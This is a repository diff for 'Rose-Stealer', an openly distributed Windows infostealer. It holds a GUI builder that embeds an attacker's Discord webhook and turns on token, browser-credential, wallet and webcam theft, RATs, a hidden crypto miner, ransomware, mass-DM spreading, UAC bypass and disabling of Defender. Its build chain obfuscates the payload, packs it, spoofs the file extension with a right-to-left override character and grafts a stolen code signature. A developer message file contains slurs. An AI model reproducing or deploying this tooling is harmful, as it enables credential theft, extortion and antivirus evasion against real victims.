batch_filepath = os.path.join(os.environ["TEMP"], "batchscript.bat")
with open(batch_filepath, "w") as f:
f.write(batch_code)
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
process = subprocess.Popen(
["cmd.exe", "/c", batch_filepath],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
startupinfo=startupinfo,
)
stdout, stderr = process.communicate()
if stderr:
print(stderr.decode(), file=sys.stderr)

3218
Rose-Stealerv1/resources/source/rose.py Normal file
View File

File diff suppressed because it is too large Load Diff

611
Rose-Stealerv1/resources/ui/builder.py Normal file
View File

@@ -0,0 +1,611 @@
import sys
import platform
import os
if int(platform.python_version_tuple()[0] + platform.python_version_tuple()[1]) > 311:
input("Python 3.12+ is not supported at this time, downgrade to Python 3.11.")
os._exit(1)
if sys.executable.endswith("pythonw.exe"):
sys.stdout = open(os.devnull, "w")
sys.stderr = open(os.path.join(os.getenv("TEMP"), "stderr-{}".format(os.path.basename(sys.argv[0]))), "w")
import string
import requests
import ctypes
import random
import logging
import subprocess
import re
import webbrowser
import asyncio
import shutil
from nicegui import ui, app
from tkinter import filedialog
from dhooks import Webhook, Embed
from pathlib import Path
from concurrent.futures import ProcessPoolExecutor
from multiprocessing import Manager, Queue
pool = ProcessPoolExecutor()
logging.basicConfig(level=logging.DEBUG, filename="roselog.log", filemode="a", format="[%(filename)s:%(lineno)d] - %(asctime)s - %(levelname)s - %(message)s")
logger = logging.getLogger(__name__)
__title__ = 'Rose UI Builder'
__avatar__ = 'https://raw.githubusercontent.com/rose-dll/Rose-Stealer/main/resources/assets/rose.png'
__version__ = '2.3'
__debugm__ = True
__icon__ = "https://raw.githubusercontent.com/rose-dll/Rose-Stealer/main/resources/assets/rose.png"
__devmsg__ = requests.get("https://raw.githubusercontent.com/rose-dll/Rose-Stealer/main/resources/ui/msg.txt").text.splitlines()[0].split(" - ")
data_builder = {"webhook_url": "", "build_name": "", "startup": False, "injection": False, "token": False, "browser": False, "deviceinf": False, "ipinf": False, "roblox": False, "rose_rat": False, "rose_rat_url": "", "knight_rat": False, "knight_bot_token": "", "knight_channel_id": "", "knight_prefix": "", "screenshot": False, "ping": False, "fake_error": False, "silent_crypto_miner": False, "wallet_adress": "", "file_pumper": False, "file_pumper_size": "", "uac_bypass": False, "disable_defender": False, "disable_firewalls": False, "antivm": False, "webcam": False, "obfuscation": False, "type_file": "", "ransomware_monero_wallet_adress": "", "ransomware_email_adress": "", "ransomware_discord_webhook_url": "", "ransomware": False, "extension_spoofer": False, "spoofed_extension": "", "spread_malware": False, "spread_malware_message": "", "ransomware_amount_of_money": "", "rose_melt_stub": False, "games": False, "tbsod": False, "bsites": False, "disableprot": False}
links = {"xpierroz_github": "https://github.com/xpierroz", "xpierroz_insta": "https://www.instagram.com/_p.slm/", "gumbobr0t_github": "https://github.com/gumbobr0t", "suegdu_github": "https://github.com/suenerve", "svn_github": "https://github.com/suvan1911", "smth_github": "https://github.com/smthpy", "rose_github": "https://github.com/rose-dll/Rose-Stealer", "rose_discord": "https://discord.gg/sMawrDqnta"}
logger.critical(f"Rose UI Builder is using version {str(__version__)}")
def open_link(key):
webbrowser.open(links[key])
def auto_update():
if __debugm__:
return
_code = "https://raw.githubusercontent.com/rose-dll/Rose-Stealer/main/resources/ui/builder.py"
code = requests.get(_code, timeout=10).text
pattern = r"__version__ = '([\d\.]+)'"
resultats = re.search(pattern, code)
if resultats:
version = resultats.group(1)
if version != __version__:
f = ctypes.windll.user32.MessageBoxW(0, f"A new version has been detected.\nWould you like to download the new version?\nCurrent version: {str(__version__)} | New version {str(version)}", "Rose-Grabber", 4)
if f == 6:
webbrowser.open("https://github.com/rose-dll/Rose-Stealer/archive/refs/heads/main.zip")
os._exit(0)
def change_data(key, value):
logger.info("change_data called with key " + key + " and value " + str(value))
global data_builder
data_builder[key] = value
logger.info("data_builder: " + str(data_builder))
return
async def _test_webhook():
result = await test_webhook(data_builder["webhook_url"])
if result == 0:
ui.notify("Webhook successfuly executed!", timeout=30, progress=True, avatar=__avatar__, color="green", position="top-left")
return
ui.notify("Webhook failed to execute!", timeout=30, progress=True, avatar=__avatar__, color="red", position="top-left")
def replace_discord_url(url):
url = url.replace("discordapp.com", "discord.com")
url = url.replace("canary.", "")
url = url.replace("ptb.", "")
return url
async def test_webhook(webhook_url):
try:
async with Webhook.Async(replace_discord_url(webhook_url)) as hook:
embed = Embed(description="Webhook is Working", color=11795068, timestamp="now")
embed.set_author(name="Success", icon_url=__icon__)
embed.set_footer(text="Rose-Stealer | t.me/rosegrabber", icon_url=__icon__)
await hook.send(embed=embed, username="Rose-Stealer | t.me/rosegrabber", avatar_url="https://raw.githubusercontent.com/rose-dll/Rose-Stealer/main/resources/assets/rose.png")
return 0
except Exception as e:
logger.error(f"Webhook failed to execute - Link: {webhook_url} - Error: {e}")
return 1
def gen_random(c: int):
characters = string.ascii_letters + string.digits
return "".join(random.choice(characters) for _ in range(c))
def _makebuild(q: Queue, data_builder) -> str:
logger.info("Entered _makebuild")
logger.info("data_builder: " + str(data_builder))
if data_builder["webhook_url"] == "":
ui.notify("Webhook URL is empty!", timeout=30, progress=True, avatar=__avatar__, color="red", position="top-left")
return
if data_builder["build_name"] == "":
ui.notify("Build Name is empty!", timeout=30, progress=True, avatar=__avatar__, color="red", position="top-left")
return
if data_builder["rose_rat"] and data_builder["rose_rat_url"] == "":
ui.notify("Rose-RAT URL is empty!", timeout=30, progress=True, avatar=__avatar__, color="red", position="top-left")
return
if data_builder["knight_rat"] and data_builder["knight_bot_token"] == "":
ui.notify("Knight-RAT Bot Token is empty!", timeout=30, progress=True, avatar=__avatar__, color="red", position="top-left")
return
if data_builder["type_file"] == "":
ui.notify("No build type selected!", timeout=30, progress=True, avatar=__avatar__, color="red", position="top-left")
return
if data_builder["file_pumper_size"] == "":
data_builder["file_pumper_size"] = None
if data_builder["rose_rat_url"] == "":
data_builder["rose_rat_url"] = ".rat"
ui.notify("Build has been started!", timeout=30, progress=True, avatar=__avatar__, color="green", position="top-left")
path = os.path.join(Path(__file__).resolve().parent, data_builder["build_name"])
rosef = os.path.join(path, "rose.py")
rosefu = os.path.join(path, "obf-rose.py")
rosefub = os.path.join(path, "obf2-rose.py")
blankobf = os.path.join(Path(__file__).resolve().parent.parent, "utils", "obfuscation", "blankobf.py")
pycloak = os.path.join(Path(__file__).resolve().parent.parent, "utils", "obfuscation", "pycloak-main")
rvenv = os.path.join(Path(__file__).resolve().parent.parent.parent, "rosevenv", "Scripts", "activate")
final = "dist\\Built.exe"
post = os.path.join(Path(__file__).resolve().parent.parent, "utils", "comp", "post.py")
logger.info(path + rosef + rosefu + blankobf)
def create_dir():
logger.info("Entered create_dir")
try:
logger.info(f"Path in create_dir is {path}")
os.mkdir(path)
except Exception as e:
logger.error(f"Error in create_dir: {e}")
def get_files():
try:
logging.info("Entered get_files")
shutil.copy(os.path.join(Path(__file__).resolve().parent.parent, "source", "rose.py"), path)
logger.info(f"Successfully copied components to {path}")
except Exception as e:
logger.error(f"Error in get_files: {e}")
def edit_config():
try:
logger.info("Entered edit_config")
with open(rosef, "r", encoding="utf-8") as f:
text = f.read()
new = (
text.replace("WEBHOOK_URL", f"{replace_discord_url(data_builder['webhook_url'])}")
.replace("rose_discord_rat = False", f"rose_discord_rat = {data_builder['rose_rat']}")
.replace("ROSE_DISCORD_RAT_SOCKET_LINK", f"{data_builder['rose_rat_url']}")
.replace("knight_discord_rat = False", f"knight_discord_rat = {data_builder['knight_rat']}")
.replace("KNIGHT_DISCORD_RAT_BOT_TOKEN", f"{data_builder['knight_bot_token']}")
.replace("KNIGHT_DISCORD_RAT_CHANNEL_ID", f"{data_builder['knight_channel_id']}")
.replace("KNIGHT_DISCORD_RAT_PREFIX", f"{data_builder['knight_prefix']}")
.replace("start_up = False", f"start_up = {data_builder['startup']}")
.replace("injection = False", f"injection = {data_builder['injection']}")
.replace("browser_stealing = False", f"browser_stealing = {data_builder['browser']}")
.replace("token_stealing = False", f"token_stealing = {data_builder['token']}")
.replace("deviceinf_stealing = False", f"deviceinf_stealing = {data_builder['deviceinf']}")
.replace("ipinf_stealing = False", f"ipinf_stealing = {data_builder['ipinf']}")
.replace("roblox_stealing = False", f"roblox_stealing = {data_builder['roblox']}")
.replace("screenshot = False", f"screenshot = {data_builder['screenshot']}")
.replace("discord_ping = False", f"discord_ping = {data_builder['ping']}")
.replace("uac_bypass = False", f"uac_bypass = {data_builder['uac_bypass']}")
.replace("xmr_miner = False", f"xmr_miner = {data_builder['silent_crypto_miner']}")
.replace("wallet_adressss", f"{data_builder['wallet_adress']}")
.replace("disable_defender = False", f"disable_defender = {data_builder['disable_defender']}")
.replace("disable_firewalls = False", f"disable_firewalls = {data_builder['disable_firewalls']}")
.replace("fake_error = False", f"fake_error = {data_builder['fake_error']}")
.replace("antivm = False", f"antivm = {data_builder['antivm']}")
.replace("webcam = False", f"webcam = {data_builder['webcam']}")
.replace("ransomware = False", f"ransomware = {data_builder['ransomware']}")
.replace("RANS0MWARE_EMAIL", f"{data_builder['ransomware_email_adress']}")
.replace("RANSOMWARE_MONERO_ADRESS_", f"{data_builder['ransomware_monero_wallet_adress']}")
.replace("RANSOMWARE_WEBHOOKURL", f"{data_builder['ransomware_discord_webhook_url']}")
.replace("spread_malware = False", f"spread_malware = {data_builder['spread_malware']}")
.replace("SPRMALWARE_MSFG", f"{data_builder['spread_malware_message']}")
.replace("RANSOMWARE_AMOUNT_0F_MONEY", f"{data_builder['ransomware_amount_of_money']}")
.replace("rose_melt_stub = False", f"rose_melt_stub = {data_builder['rose_melt_stub']}")
.replace("games = False", f"games = {data_builder['games']}")
.replace("ts_bsod = False", f"ts_bsod = {data_builder['tbsod']}")
.replace("block_sites = False", f"block_sites = {data_builder['bsites']}")
.replace("disable_protectors = False", f"disable_protectors = {data_builder['disableprot']}")
)
with open(rosef, "w", encoding="utf-8") as f:
f.write(new)
except Exception as e:
logger.error(f"Error in edit_config: {e}")
def obfuscate():
logger.info("Entered obfuscate")
if data_builder["obfuscation"]:
logger.info("Entering obfuscate")
try:
logger.info("Entering obfuscate process")
obf1 = f'call "{rvenv}" && python "{blankobf}" -o "{rosefu}" "{rosef}"'
logger.info(obf1)
subprocess.call(obf1, shell=True, stderr=subprocess.STDOUT)
install = f'call "{rvenv}" && cd "{pycloak}" && pip install .'
logger.info(install)
subprocess.call(install, shell=True, stderr=subprocess.STDOUT)
obf2 = f'call "{rvenv}" && pycloak -o "{rosefub}" -d "{rosefu}"'
logger.info(obf2)
subprocess.call(obf2, shell=True, stderr=subprocess.STDOUT)
os.remove(rosefu)
logger.info("Finished obfuscate process")
except Exception as e:
logger.error(f"Error in obfuscate: {e}")
def pump_file():
logger.info("Entered pump_file")
pumping_proc = 0
if data_builder["file_pumper"]:
if data_builder["file_pumper_size"] is not None:
logger.info(f"DEBUGGING File pumper size is set to {data_builder['file_pumper_size']} MB")
logger.info("Entering file pump process")
try:
b_size = int(data_builder["file_pumper_size"]) * 1048576
bufferSize = 256
with open(f"{data_builder['build_name']}.exe", "ab") as f:
for i in range(b_size // bufferSize):
f.write(bytes([0] * bufferSize))
pumping_proc += 1
logger.info(f"Pumped successfuly for {pumping_proc} times ({data_builder['file_pumper_size']})")
logger.info("Finished file pump process")
except Exception as e:
logger.error(f"Error in pumping file: {e}")
def compile_python():
logger.info("Entered py compile")
upx_dir = os.path.join(Path(__file__).resolve().parent.parent, "utils", "upx-4.1.0-win64")
himports = [
"os",
"re",
"ctypes",
"pygame",
"pygame.camera",
"subprocess",
"threading",
"sys",
"platform",
"shutil",
"sqlite3",
"string",
"random",
"browser_cookie3",
"base64",
"json",
"requests",
"psutil",
"discord",
"discord.ext",
"discord.ext.commands",
"winreg",
"win32con",
"keyboard",
"pywifi",
"pathlib",
"cv2",
"io",
"time",
"pyttsx3",
"webbrowser",
"socketio",
"uuid",
"socket",
"pyautogui",
"wmi",
"GPUtil",
"zipfile",
"getmac",
"errno",
"urllib",
"urllib.error",
"pynput",
"pynput.keyboard",
"cryptography",
"cryptography.fernet",
"win32crypt",
"dhooks",
"Crypto",
"Crypto.Cipher",
"Crypto.Cipher.AES",
"PIL",
"PIL.ImageGrab",
"zlib",
"mss",
"datetime",
"ctypes.windll",
"ctypes.c_int",
"ctypes.c_uint",
"ctypes.c_ulong",
"ctypes.POINTER",
"ctypes.byref",
"json.loads",
"json.dumps",
"zipfile.ZipFile",
"urllib.request",
"urllib.request.Request",
"urllib.request.urlopen",
"base64.b64decode",
"socketio",
"time",
"zlib.compress",
"mss.mss",
"lzma",
"aiohttp",
]
himports = [item for item in himports if item]
imports = " ".join(["--hidden-import=" + module for module in himports])
compile_line = f'call "{rvenv}" && pyinstaller "{rosefub if data_builder["obfuscation"] else rosef}" --clean --name="Built" --upx-dir="{upx_dir}" --noconsole --onefile {imports}'
try:
logger.info("Entering python compile process")
logger.info(f"Python Compile CMD Line: {compile_line}")
output_file = "rosecompile.log"
subprocess.call(compile_line, shell=True, stdout=open(output_file, "w"), stderr=subprocess.STDOUT)
logger.info(f"Output of Python compile process saved in rosecompile.log")
subprocess.call(f'call "{rvenv}" && python "{post}" dist/Built.exe', shell=True, stderr=subprocess.STDOUT)
except Exception as e:
logger.error(f"Error in py compile: {e}")
def cleanup():
logger.info("Entered cleanup")
try:
shutil.move(final, os.path.join(os.getcwd(), f"{data_builder['build_name']}.exe"))
shutil.rmtree(os.path.join(os.getcwd(), "build"))
shutil.rmtree(os.path.join(os.getcwd(), "dist"))
shutil.rmtree(os.path.join(os.getcwd(), "resources", "ui", data_builder["build_name"]))
os.remove(os.path.join(os.getcwd(), "Built.spec"))
except Exception as e:
logger.error(f"Error in cleanup: {e}")
def assign_extension():
logger.info("Entered assign_extension")
old_exe_path = os.path.join(os.getcwd(), data_builder["build_name"] + ".exe")
new_scr_path = os.path.join(os.getcwd(), data_builder["build_name"] + ".scr")
if data_builder["type_file"] == "Screensaver (.scr)":
os.rename(old_exe_path, new_scr_path)
def upx():
logger.info("Entered upx")
try:
shutil.copy(os.path.join(Path(__file__).resolve().parent.parent, "utils", "upx-4.1.0-win64", "upx.exe"), os.getcwd())
subprocess.run(f'upx -9kqvf {data_builder["build_name"]}.exe', shell=True)
os.remove(os.path.join(os.getcwd(), "upx.exe"))
except Exception as e:
logger.error(f"Error in upx: {e}")
logger.info("Finished upx")
def extension_spoofer():
logger.info("Entered extension_spoofer")
spoofer = "\u202e"
extension = data_builder["spoofed_extension"]
executable_to_spoof = f'{data_builder["build_name"]}.scr' if data_builder["type_file"] == "Screensaver (.scr)" else f'{data_builder["build_name"]}.exe'
if data_builder["extension_spoofer"]:
try:
extension_added = executable_to_spoof[: len(executable_to_spoof) - 4] + extension[::-1] + executable_to_spoof[-4:]
global spoofed
spoofed = extension_added[: len(extension_added) - 7] + spoofer + extension_added[-7:]
with open(spoofed, "wb") as spoofed_executable:
with open(executable_to_spoof, "rb") as source_executable:
spoofed_executable.write(source_executable.read())
except Exception as e:
logger.error(f"Error in extension_spoofer: {e}")
logger.info("Finished extension_spoofer")
create_dir()
q.put_nowait(0.1)
get_files()
q.put_nowait(0.2)
edit_config()
q.put_nowait(0.3)
obfuscate()
q.put_nowait(0.4)
compile_python()
q.put_nowait(0.5)
cleanup()
q.put_nowait(0.6)
upx()
q.put_nowait(0.7)
pump_file()
q.put_nowait(0.8)
assign_extension()
q.put_nowait(0.9)
extension_spoofer()
q.put_nowait(1)
return "Done!"
def _home():
with ui.dialog() as dialog, ui.card():
ui.label(f"If the compilation process completed successfully, you should find the executable file within the designated folder. In case you encounter any issues, we kindly invite you to join our Discord community for further assistance.")
ui.button("Open Folder", on_click=lambda: os.startfile(os.getcwd()))
ui.button("Join Discord", on_click=lambda: webbrowser.open(links["rose_discord"]))
ui.button("Close", on_click=dialog.close)
async def start_computation():
progressbar.visible = True
loop = asyncio.get_running_loop()
result = await loop.run_in_executor(pool, _makebuild, queue, data_builder)
logger.info(result)
dialog.open()
progressbar.visible = False
queue = Manager().Queue()
ui.timer(0.1, callback=lambda: progressbar.set_value(queue.get() if not queue.empty() else progressbar.value))
with ui.card():
with ui.row():
ui.input(label="Webhook URL", placeholder="Rose on top baby", on_change=lambda e: change_data("webhook_url", e.value)).props("inline color=pink-3").classes("w-full")
ui.input(label="Build name", placeholder="Rose on top baby", on_change=lambda e: change_data("build_name", e.value)).props("inline color=pink-3").classes("w-full")
ui.select(label="File type", options=["Executable (.exe)", "Screensaver (.scr)"], on_change=lambda e: change_data("type_file", e.value)).props("color=pink-3").classes("w-full")
ui.checkbox("Obfuscation", on_change=lambda e: change_data("obfuscation", e.value)).props("inline color=pink-3")
with ui.row():
_pumper = ui.checkbox("Pump file", on_change=lambda e: change_data("file_pumper", e.value)).props("inline color=pink-3")
ui.input(label="Pump Size", placeholder="Size in MB", on_change=lambda e: change_data("file_pumper_size", e.value)).bind_visibility_from(_pumper, "value").props("inline color=pink-3")
with ui.row():
_spoofer = ui.checkbox("Extension Spoofer", on_change=lambda e: change_data("extension_spoofer", e.value)).props("inline color=pink-3")
ui.input(label="Spoofed Extension", placeholder="xlsx, png etc.", on_change=lambda e: change_data("spoofed_extension", e.value)).bind_visibility_from(_spoofer, "value").props("inline color=pink-3")
ui.button("Test Webhook", on_click=_test_webhook).props("icon=code color=purple-11").classes("w-full")
ui.button("Build", on_click=start_computation).props("icon=build color=pink-3").classes("w-full")
progressbar = ui.linear_progress(value=0, show_value=False).props("instant-feedback rounded color=green-8 size=35px stripe")
progressbar.visible = False
def _features():
with ui.card():
with ui.row():
ui.button("Knight RAT Docs", on_click=lambda: webbrowser.open("https://github.com/rose-dll/Rose-Stealer/blob/main/docs/KNIGHT.md"))
ui.button("Features Docs", on_click=lambda: webbrowser.open("https://github.com/rose-dll/Rose-Stealer/blob/main/docs/FEATURES.md"))
ui.button("Changelog Docs", on_click=lambda: webbrowser.open("https://github.com/rose-dll/Rose-Stealer/blob/main/docs/CHANGELOG.md"))
with ui.expansion("System", icon="work").classes("w-full"):
with ui.row():
with ui.column():
ui.checkbox("Startup", on_change=lambda e: change_data("startup", e.value)).props("inline color=pink")
with ui.row():
_inj = ui.checkbox("Injection", on_change=lambda e: change_data("injection", e.value)).props("inline color=pink")
with ui.column():
ui.checkbox("Fake Error", on_change=lambda e: change_data("fake_error", e.value)).props("inline color=pink")
ui.checkbox("Anti-VM", on_change=lambda e: change_data("antivm", e.value)).props("inline color=pink")
with ui.expansion("Stealer", icon="work").classes("w-full"):
with ui.row():
with ui.column():
with ui.row():
_token = ui.checkbox("Token", on_change=lambda e: change_data("token", e.value)).props("inline color=green")
_spread = ui.checkbox("Mass DM friends", on_change=lambda e: change_data("spread_malware", e.value)).bind_visibility_from(_token, "value").props("inline color=green")
ui.input(label="Message", placeholder="Rose on top baby", on_change=lambda e: change_data("spread_malware_message", e.value)).bind_visibility_from(_spread, "value").props("inline color=green")
ui.checkbox("Browser Credentials", on_change=lambda e: change_data("browser", e.value)).props("inline color=green")
ui.checkbox("Games and Wallets", on_change=lambda e: change_data("games", e.value)).props("inline color=green")
ui.checkbox("Screenshot", on_change=lambda e: change_data("screenshot", e.value)).props("inline color=green")
ui.checkbox("Webcam", on_change=lambda e: change_data("webcam", e.value)).props("inline color=green")
with ui.column():
ui.checkbox("System Information", on_change=lambda e: change_data("deviceinf", e.value)).props("inline color=green")
ui.checkbox("IP & Wi-Fi Data", on_change=lambda e: change_data("ipinf", e.value)).props("inline color=green")
ui.checkbox("Roblox", on_change=lambda e: change_data("roblox", e.value)).props("inline color=green")
ui.checkbox("Ping", on_change=lambda e: change_data("ping", e.value)).props("inline color=green")
with ui.expansion("Advanced", icon="work").classes("w-full"):
with ui.row():
with ui.column():
with ui.row():
_miner = ui.checkbox("XMR Miner", on_change=lambda e: change_data("silent_crypto_miner", e.value)).props("inline color=yellow-7")
ui.input(label="XMR Wallet Address", placeholder="Wallet Address", on_change=lambda e: change_data("wallet_adress", e.value)).bind_visibility_from(_miner, "value").props("inline color=yellow-7")
with ui.row():
_rose_rat = ui.checkbox("Rose-RAT", on_change=lambda e: change_data("rose_rat", e.value)).props("inline color=yellow-7")
ui.input(label="Rose-RAT Server URL", placeholder="Rose on top baby", on_change=lambda e: change_data("rose_rat_url", e.value)).bind_visibility_from(_rose_rat, "value").props("inline color=yellow-7")
with ui.row():
_knight_rat = ui.checkbox("Knight-RAT", on_change=lambda e: change_data("knight_rat", e.value)).props("inline color=yellow-7")
ui.input(label="Knight-RAT Bot Token", placeholder="Knight on top baby", on_change=lambda e: change_data("knight_bot_token", e.value)).bind_visibility_from(_knight_rat, "value").props("inline color=yellow-7")
ui.input(label="Knight-RAT Channel ID", placeholder="Knight on top baby", on_change=lambda e: change_data("knight_channel_id", e.value)).bind_visibility_from(_knight_rat, "value").props("inline color=yellow-7")
ui.input(label="Knight-RAT Command Prefix", placeholder="Knight on top baby", on_change=lambda e: change_data("knight_prefix", e.value)).bind_visibility_from(_knight_rat, "value").props("inline color=yellow-7")
with ui.row():
_ransom = ui.checkbox("Rose Ransomware", on_change=lambda e: change_data("ransomware", e.value)).props("inline color=yellow-7")
ui.input(label="XMR Wallet adress", placeholder="Rose On Top baby!!!", on_change=lambda e: change_data("ransomware_monero_wallet_adress", e.value)).bind_visibility_from(_ransom, "value").props("inline color=yellow-7")
ui.input(label="Webhook URL", placeholder="Rose On Top baby!!!", on_change=lambda e: change_data("ransomware_discord_webhook_url", e.value)).bind_visibility_from(_ransom, "value").props("inline color=yellow-7")
ui.input(label="Email adress", placeholder="Email adress here", on_change=lambda e: change_data("ransomware_email_adress", e.value)).bind_visibility_from(_ransom, "value").props("inline color=yellow-7")
ui.input(label="Amount of money", placeholder="Amount of money the victim has to pay. (in USD)", on_change=lambda e: change_data("ransomware_amount_of_money", e.value)).bind_visibility_from(_ransom, "value").props("inline color=yellow-7")
with ui.column():
ui.checkbox("Self-Deletion", on_change=lambda e: change_data("rose_melt_stub", e.value)).props("inline color=yellow-7")
ui.checkbox("Trigger BSOD", on_change=lambda e: change_data("tbsod", e.value)).props("inline color=yellow-7")
with ui.row():
_uac = ui.checkbox("UAC Bypass", on_change=lambda e: change_data("uac_bypass", e.value)).props("inline color=yellow-7")
ui.checkbox("Disable Protectors", on_change=lambda e: change_data("disableprot", e.value)).bind_visibility_from(_uac, "value").props("inline color=yellow-7")
ui.checkbox("Block Sites", on_change=lambda e: change_data("bsites", e.value)).bind_visibility_from(_uac, "value").props("inline color=yellow-7")
def _github():
with ui.card():
with ui.row():
ui.button("Open Rose Log", on_click=lambda: os.startfile(os.path.join(os.getcwd(), "roselog.log")))
ui.button("Open Rose Compile Log (.py)", on_click=lambda: os.startfile(os.path.join(os.getcwd(), "rosecompile.log")))
with ui.column():
ui.markdown(f"<code>Message from {__devmsg__[0]}: {__devmsg__[1]}</code>")
with ui.row():
with ui.card_section():
ui.label("xpierroz").classes("text-h6")
ui.markdown('<em>- "GUMBO MAKE A FUCKING PR"</em>').classes("text-subtitle5")
with ui.row():
# ui.label(" ") # Because the button are so sticked together without (sex button) - xpierroz 03/24
ui.button(on_click=lambda: open_link("xpierroz_github")).props("round icon=code color=blue-11")
ui.button(on_click=lambda: open_link("xpierroz_insta")).props("round icon=star_rate color=amber-8")
with ui.card_section():
ui.label("gumbobr0t").classes("text-h6")
ui.markdown('<em>- "buddy it\'s not my fault"</em>').classes("text-subtitle5")
ui.button(on_click=lambda: open_link("gumbobr0t_github")).props("round icon=code color=blue-11")
with ui.row():
with ui.card_section():
ui.label("suegdu").classes("text-h6")
ui.markdown('<em>- "bruh"</em>').classes("text-subtitle5")
ui.button(on_click=lambda: open_link("suegdu_github")).props("round icon=code color=blue-11")
with ui.card_section():
ui.label("svn").classes("text-h6")
ui.markdown("<em>*svn died*</em>").classes("text-subtitle5")
ui.button(on_click=lambda: open_link("svn_github")).props("round icon=code color=blue-11")
with ui.card_section():
ui.label("smth.py").classes("text-h6")
ui.markdown("<em>- Nothing.</em>").classes("text-subtitle5")
ui.button(on_click=lambda: open_link("smth_github")).props("round icon=code color=blue-11")
with ui.card():
with ui.card_section():
with ui.row():
ui.label(f"Rose {__version__}").classes("text-h6")
ui.button(on_click=lambda: open_link("rose_github")).props("round icon=code color=blue-11")
ui.button(on_click=lambda: open_link("rose_discord")).props("round icon=unsubscribe color=indigo-12")
ui.colors(primary="#333")
@ui.page("/home")
def superhome():
ui.image("https://raw.githubusercontent.com/rose-dll/Rose-Stealer/main/resources/assets/rose.png").style("position: center; width: 90px; left: 220px;")
global tabs
with ui.tabs().classes("w-full") as tabs:
ui.tab("Home", icon="home")
ui.tab("Features", icon="fingerprint")
ui.tab("Settings", icon="face")
with ui.tab_panels(tabs, value="Home").classes("bg-transparent").classes("center"):
with ui.tab_panel("Home").classes("bg-transparent").classes("center"):
_home()
with ui.tab_panel("Features"):
_features()
with ui.tab_panel("Settings"):
_github()
v = ui.video("https://github.com/rose-dll/Rose-Stealer/raw/main/resources/assets/roseloadingscreen.mp4", autoplay=True, loop=False, muted=True, controls=False).style("position: absolute; top: 0; left: 0; width: 100%; height: 100%; object-fit: cover;")
v.on("ended", lambda _: ui.open("/home"))
app.on_shutdown(pool.shutdown)
def start_nicegui(**kwargs):
ui.run(title=__title__, **kwargs)
if __name__ in {"__main__", "__mp_main__"}:
auto_update()
ui.run(native=True, dark=True, reload=False, show=False, port=2009, window_size=(600, 660), title=__title__)

5
Rose-Stealerv1/resources/ui/msg.txt Normal file
View File

@@ -0,0 +1,5 @@
gumbobr0t - dang i love boobs
xpierroz - GUMBO MAKE A FUCKING PR
xpierroz - releasing soon
xpierroz - fuck lgbtq
gumbobr0t - BUDDY ITS NOT MY FAULT

BIN
Rose-Stealerv1/resources/utils/comp/cert Normal file
View File

Binary file not shown.

41
Rose-Stealerv1/resources/utils/comp/post.py Normal file
View File

@@ -0,0 +1,41 @@
import os
from sigthief import signfile
def RemoveMetaData(path: str):
print("Removing MetaData")
with open(path, "rb") as file:
data = file.read()
data = data.replace(b"PyInstaller:", b"PyInstallem:")
data = data.replace(b"pyi-runtime-tmpdir", b"bye-runtime-tmpdir")
data = data.replace(b"pyi-windows-manifest-filename", b"bye-windows-manifest-filename")
with open(path, "wb") as file:
file.write(data)
def AddCertificate(path: str):
print("Adding Certificate")
certFile = "resources/utils/comp/cert"
if os.path.isfile(certFile):
signfile(path, certFile, path)
def RenameEntryPoint(path: str, entryPoint: str):
print("Renaming Entry Point")
with open(path, "rb") as file:
data = file.read()
entryPoint = entryPoint.encode()
new_entryPoint = b'\x00' + os.urandom(len(entryPoint) - 1)
data = data.replace(entryPoint, new_entryPoint)
with open(path, "wb") as file:
file.write(data)
if __name__ == "__main__":
builtFile = os.path.join("dist", "Built.exe")
if os.path.isfile(builtFile):
RemoveMetaData(builtFile)
AddCertificate(builtFile)
RenameEntryPoint(builtFile, "rose")
else:
print("Not Found")

276
Rose-Stealerv1/resources/utils/comp/sigthief.py Normal file
View File

@@ -0,0 +1,276 @@
#!/usr/bin/env python3
# LICENSE: BSD-3
# Copyright: Josh Pitts @midnite_runr
import sys
import struct
import shutil
import io
import os
from optparse import OptionParser
def gather_file_info_win(binary):
"""
Borrowed from BDF...
I could just skip to certLOC... *shrug*
"""
flItms = {}
binary = open(binary, 'rb')
binary.seek(int('3C', 16))
flItms['buffer'] = 0
flItms['JMPtoCodeAddress'] = 0
flItms['dis_frm_pehdrs_sectble'] = 248
flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
# Start of COFF
flItms['COFF_Start'] = flItms['pe_header_location'] + 4
binary.seek(flItms['COFF_Start'])
flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
binary.seek(flItms['COFF_Start'] + 2, 0)
flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
binary.seek(flItms['COFF_Start'] + 16, 0)
flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
#End of COFF
flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
#if flItms['SizeOfOptionalHeader']:
#Begin Standard Fields section of Optional Header
binary.seek(flItms['OptionalHeader_start'])
flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
flItms['SizeOfUninitializedData'] = struct.unpack("<I",
binary.read(4))[0]
flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
if flItms['Magic'] != 0x20B:
flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
# End Standard Fields section of Optional Header
# Begin Windows-Specific Fields of Optional Header
if flItms['Magic'] == 0x20B:
flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
else:
flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
binary.read(2))[0]
flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
binary.read(2))[0]
flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
